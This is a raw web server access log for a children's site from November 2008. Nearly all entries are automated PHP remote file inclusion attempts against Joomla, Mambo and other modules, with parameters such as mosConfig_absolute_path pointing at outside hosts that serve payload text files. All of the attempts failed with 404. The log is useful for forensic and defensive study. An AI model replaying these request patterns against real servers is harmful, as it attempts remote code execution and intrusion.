203.231.35.38 - - [20/Nov/2008:02:08:58 -0700] "GET /logs/access_log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
203.231.35.38 - - [20/Nov/2008:02:10:06 -0700] "GET /logs/access_log.old//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
69.147.79.37 - - [20/Nov/2008:02:14:33 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Scooter/3.3" "-"
69.147.79.37 - - [20/Nov/2008:02:14:33 -0700] "GET /images/adimages/THAmagicschoolbus.jpg HTTP/1.1" 206 2 www.wnckids.com "-" "Scooter/3.3" "-"
70.85.149.242 - - [20/Nov/2008:02:16:21 -0700] "GET //index.php?DOCUMENT_ROOT=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
70.85.149.242 - - [20/Nov/2008:02:16:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
222.233.52.18 - - [20/Nov/2008:02:20:00 -0700] "GET /logs/errors.php?error=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "-"
222.233.52.18 - - [20/Nov/2008:02:20:00 -0700] "GET /errors.php?error=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "-"
195.137.143.11 - - [20/Nov/2008:02:24:41 -0700] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [20/Nov/2008:02:24:42 -0700] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:02:28:05 -0700] "GET /logs/access_log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/kangkung.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:02:28:05 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/kangkung.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:02:28:05 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/kangkung.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
213.165.87.57 - - [20/Nov/2008:02:28:06 -0700] "GET /logs/error_log.old//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/kangkung.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
174.133.70.138 - - [20/Nov/2008:02:30:44 -0700] "GET /logs/./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [20/Nov/2008:02:30:44 -0700] "GET /./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
193.178.145.13 - - [20/Nov/2008:02:30:49 -0700] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
193.178.145.13 - - [20/Nov/2008:02:30:49 -0700] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
174.133.70.138 - - [20/Nov/2008:02:31:17 -0700] "GET /logs/access_log.old/./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [20/Nov/2008:02:31:17 -0700] "GET /./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
174.133.70.138 - - [20/Nov/2008:02:31:17 -0700] "GET /logs/./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
203.167.102.84 - - [20/Nov/2008:02:33:55 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
203.167.102.84 - - [20/Nov/2008:02:33:56 -0700] "GET //administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.30.142.122 - - [20/Nov/2008:02:34:24 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.122 - - [20/Nov/2008:02:34:25 -0700] "GET /oldcalendars/calendarjune06.htm HTTP/1.0" 200 102078 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
203.167.102.84 - - [20/Nov/2008:02:34:41 -0700] "GET /logs//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
203.167.102.84 - - [20/Nov/2008:02:34:41 -0700] "GET //administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:36:40 -0700] "GET /logs/access_log.old//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
59.125.183.76 - - [20/Nov/2008:02:36:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
201.94.235.191 - - [20/Nov/2008:02:36:51 -0700] "GET /logs/access_log.old%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:36:51 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:36:51 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:07 -0700] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:09 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:09 -0700] "GET /logs/access_log.old/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:37:09 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:37:29 -0700] "GET /logs/access_log%20/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:37:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:37:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:02 -0700] "GET /logs/access_log.old%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:02 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:02 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:06 -0700] "GET /logs/access_log%20/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:38:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
64.254.233.2 - - [20/Nov/2008:02:39:10 -0700] "GET /logs/access_log.old/./purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:02:39:10 -0700] "GET /./purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:02:39:10 -0700] "GET /logs/./purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
201.94.235.191 - - [20/Nov/2008:02:39:19 -0700] "GET /logs/access_log.old/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
200.126.104.110 - - [20/Nov/2008:02:39:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:02:39:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:02:39:46 -0700] "GET /logs/access_log%20/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
98.193.117.182 - - [20/Nov/2008:02:41:24 -0700] "GET /logs/access_log.old%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:02:41:39 -0700] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:41:45 -0700] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:02:41:46 -0700] "GET /logs/access_log.old/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
222.237.78.125 - - [20/Nov/2008:02:41:54 -0700] "GET /errors.php?error=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
59.125.183.76 - - [20/Nov/2008:02:42:03 -0700] "GET /logs/homepage.php?sel=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:42:03 -0700] "GET /homepage.php?sel=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:42:06 -0700] "GET /logs/homepage.php?sel=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:42:06 -0700] "GET /homepage.php?sel=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:02:42:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:02:42:27 -0700] "GET /logs/access_log.old/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
200.126.104.110 - - [20/Nov/2008:02:42:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
98.193.117.182 - - [20/Nov/2008:02:42:54 -0700] "GET /logs/access_log%20/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
189.32.144.177 - - [20/Nov/2008:02:43:57 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.199.39.40 - - [20/Nov/2008:02:47:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.199.39.40 - - [20/Nov/2008:02:47:52 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.199.39.40 - - [20/Nov/2008:02:48:01 -0700] "GET /logs/access_log.old/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
189.32.144.177 - - [20/Nov/2008:02:48:52 -0700] "GET /logs/access_log%20/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
189.32.144.177 - - [20/Nov/2008:02:49:49 -0700] "GET /logs/access_log.old%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.199.39.40 - - [20/Nov/2008:02:50:57 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:57:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:57:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:02:57:04 -0700] "GET /logs/access_log//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
59.125.183.76 - - [20/Nov/2008:02:58:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:58:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:58:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:02:58:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
174.133.70.138 - - [20/Nov/2008:02:58:36 -0700] "GET /logs/access_log/./include/lib.inc.php?site_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
75.44.145.41 - - [20/Nov/2008:03:00:39 -0700] "GET /favicon.ico HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "-"
189.32.144.177 - - [20/Nov/2008:03:01:13 -0700] "GET /logs/access_log//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
72.30.142.248 - - [20/Nov/2008:03:02:55 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.248 - - [20/Nov/2008:03:02:56 -0700] "GET /wwwstat/Nov.usage.html HTTP/1.0" 200 10715 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
201.94.235.191 - - [20/Nov/2008:03:03:12 -0700] "GET /logs/access_log//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:03:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
201.94.235.191 - - [20/Nov/2008:03:03:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:03:09:05 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:03:09:05 -0700] "GET /logs/access_log//modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
70.180.114.149 - - [20/Nov/2008:03:09:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
64.254.233.2 - - [20/Nov/2008:03:11:02 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
64.254.233.2 - - [20/Nov/2008:03:11:02 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
72.30.142.89 - - [20/Nov/2008:03:16:22 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.142.89 - - [20/Nov/2008:03:16:24 -0700] "GET /images/calendar.htm HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
70.84.182.98 - - [20/Nov/2008:03:20:42 -0700] "GET /logs/access_log.old/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [20/Nov/2008:03:20:47 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [20/Nov/2008:03:20:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [20/Nov/2008:03:21:17 -0700] "GET /logs/access_log.old/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [20/Nov/2008:03:21:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
70.84.182.98 - - [20/Nov/2008:03:21:22 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
98.193.117.182 - - [20/Nov/2008:03:24:29 -0700] "GET /logs/access_log.old%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:03:24:29 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
98.193.117.182 - - [20/Nov/2008:03:24:29 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.lycos.es/qweqwe/id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.808" "-"
64.254.233.2 - - [20/Nov/2008:03:24:44 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
87.106.245.44 - - [20/Nov/2008:03:25:51 -0700] "GET //include/admin.lib.inc.php?site_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
59.125.183.76 - - [20/Nov/2008:03:26:20 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:03:26:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
59.125.183.76 - - [20/Nov/2008:03:26:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
